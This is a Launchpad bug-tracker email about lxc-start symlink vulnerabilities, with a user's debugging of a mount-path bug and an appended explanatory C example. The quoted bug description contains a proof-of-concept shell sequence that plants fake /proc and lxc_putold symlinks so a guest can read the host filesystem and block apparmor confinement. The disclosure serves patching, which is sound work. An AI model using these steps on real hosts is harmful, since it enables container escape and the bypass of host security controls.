
touch-packages team mailing list archive

[Bug 1476662] Re: lxc-start symlink vulnerabilities may allow guest to read host filesystem, interfere with apparmor


I have a similar problem (but not with /proc).

***Roman Fiedler's link (above) suggests the correct workaround.***

My lxc configuration file has the following line:

>  lxc.mount.entry = /data/references /var/lib/lxc/noteServer/rootfs/data/references none ro,bind 0 0

(Note that the mount directory is an **absolute** path)

My resulting error message (in /var/log/lxc/noteServer.log) is:

>  lxc-start 1443599663.225 ERROR    lxc_utils - utils.c:ensure_not_symlink:1384 - Mount onto /usr/lib/x86_64-linux-gnu/lxc//data/references resulted in /usr/lib/x86_64-linux-gnu/lxc/data/references

Tracing through the apt-get source lxc code I think the offending code
(in the mount_entry_on_absolute_rootfs function in the
lxc-1.0.7/src/lxc/conf.c file) is:

>        aux = strstr(mntent->mnt_dir, path);
>        if (aux) {
>                offset = strlen(path);
>                goto skipabs;
>        }
>
>skipvarlib:
>        aux = strstr(mntent->mnt_dir, rootfs->path);
>        if (!aux) {
>                WARN("ignoring mount point '%s'", mntent->mnt_dir);
>                goto out;
>        }
>        offset = strlen(rootfs->path);
>
>skipabs:
>
>        r = snprintf(path, MAXPATHLEN, "%s/%s", rootfs->mount,
>                 aux + offset);

Note that the last line should (probably -- I have not compiled any code
to test this) be:

>        r = snprintf(path, MAXPATHLEN, "%s/%s", rootfs->mount,
>                 aux + offset + 1);

The "+1" then skips over the "/" in the mntent->mnt_dir so there will
only be *one* "/" in the resulting path.

Note that the workaround in Roman Fiedler's link ensures that the mount
entry uses the mount_entry_on_relative_rootfs function (which works)
rather than the (currently broken?) mount_entry_on_absolute_rootfs
function.

I can confirm that the following configuration line:

> lxc.mount.entry = /data/references data/references none ro,bind 0 0

now in fact works, since it specifies a **relative** mount directory and
so invokes the mount_entry_on_relative_rootfs function.

Many thanks for excellent **open source** tools!

-- 
You received this bug notification because you are a member of Ubuntu
Touch seeded packages, which is subscribed to lxc in Ubuntu.
https://bugs.launchpad.net/bugs/1476662

Title:
  lxc-start symlink vulnerabilities may allow guest to read host
  filesystem, interfere with apparmor

Status in lxc package in Ubuntu:
  Fix Released

Bug description:
  lxc-start shuffles around mounts using helper directory
  /usr/lib/x86_64-linux-gnu/lxc (guest root fs is mounted here)

  It then modifies mounts operating in guest root directory before
  invoking init. As it does not check if all mount points are
  directories, a malicious guest may modify its internal structure
  before shutdown (or was created using manipulated image) and then when
  started again, guest may

  * Access the whole host root filesystem

  * Block switching from lxc-start apparmor profile to lxc-container-
  default

  
  # Real putold before pivot-root (root fs will end here)
  mkdir -p /x/lxc_putold

  # Faked putold
  ln -s /usr/lib/x86_64-linux-gnu/lxc/x/lxc_putold lxc_putold
  mkdir -p /usr/lib/x86_64-linux-gnu/lxc/x/lxc_putold/proc
  touch /usr/lib/x86_64-linux-gnu/lxc/x/lxc_putold/proc/mounts

  
  # proc fake
  mkdir -p /x/proc
  umount /proc
  rmdir /proc
  ln -s /usr/lib/x86_64-linux-gnu/lxc/x/proc proc

  mkdir -p /usr/lib/x86_64-linux-gnu/lxc/x/proc/1/attr /usr/lib/x86_64-linux-gnu/lxc/x/proc/self
  touch /usr/lib/x86_64-linux-gnu/lxc/x/proc/1/attr/current
  touch /usr/lib/x86_64-linux-gnu/lxc/x/proc/self/status


  The  issue was also found during
  https://service.ait.ac.at/security/2015/LxcSecurityAnalysis.html

To manage notifications about this bug go to:
https://bugs.launchpad.net/ubuntu/+source/lxc/+bug/1476662/+subscriptions
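As an added example (not code from this bug thread or from lxc), the path construction the comment above traces through is rebuilt in C beside an assumed realpath()-based symlink check modelled on the quoted error message, to show why the doubled "/" alone makes a real directory fail the check. The scratch directory, `build_target`, `demo` and the body of `ensure_not_symlink` are my reconstruction, not lxc's own code.

```c
#define _XOPEN_SOURCE 700
#include <limits.h>
#include <stdio.h>
#include <stdlib.h>
#include <string.h>
#include <sys/stat.h>
#include <unistd.h>

/* Build the mount target the way the quoted absolute-rootfs code does. `tail`
 * stands for aux + offset (still begins with '/'); skip_slash applies the "+1". */
static int build_target(char *out, size_t outlen, const char *mount,
                        const char *tail, int skip_slash)
{
    if (skip_slash && tail[0] == '/')
        tail++;
    return snprintf(out, outlen, "%s/%s", mount, tail);
}

/* Assumed reconstruction (not lxc's code) of the check behind the error message:
 * resolve the target and require the canonical spelling to equal the string
 * we were handed. Returns 0 = accepted, -1 = rejected or error. */
static int ensure_not_symlink(const char *dest)
{
    char real[PATH_MAX];
    if (!realpath(dest, real))
        return -1;
    return strcmp(real, dest) == 0 ? 0 : -1;
}

/* Scratch helper dir holding a real (non-symlink) subdirectory "data": build
 * the target with or without the "+1" and run the check on it. */
static int demo(int skip_slash)
{
    char tmpl[] = "/tmp/lxcdemoXXXXXX", base[PATH_MAX], sub[PATH_MAX], target[PATH_MAX];
    if (!mkdtemp(tmpl) || !realpath(tmpl, base)) /* base: canonical scratch dir */
        return -1;
    snprintf(sub, sizeof sub, "%s/data", base);
    mkdir(sub, 0700);
    build_target(target, sizeof target, base, "/data", skip_slash);
    int rc = ensure_not_symlink(target);
    rmdir(sub);
    rmdir(base);
    return rc;
}

int main(void)
{
    printf("as quoted: %d, with +1: %d\n", demo(0), demo(1)); /* -1 then 0 */
    return 0;
}
```

The rejected case reproduces the "Mount onto .../lxc//data/references resulted in .../lxc/data/references" mismatch with no symlink involved at all; the same string comparison is what catches a genuine symlink, so the check itself is sound and only the non-canonical input defeats it.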